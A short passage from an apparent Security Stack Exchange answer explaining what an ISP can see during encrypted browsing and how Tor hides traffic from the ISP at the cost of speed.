specific page you are requesting, nor the data of the page itself. If extreme privacy is a need, Tor may be the answer. It has plenty of downsides, the primary being slow speed (compared to normal browsing). But when using Tor, your ISP cannot see your network information, aside from the fact that you're using Tor. And the nodes on Tor are unable to know both the source (you) and destination (the website) due to the way the protocol is designed.
{ "source": [ "https://security.stackexchange.com/questions/117013", "https://security.stackexchange.com", "https://security.stackexchange.com/users/99028/" ] }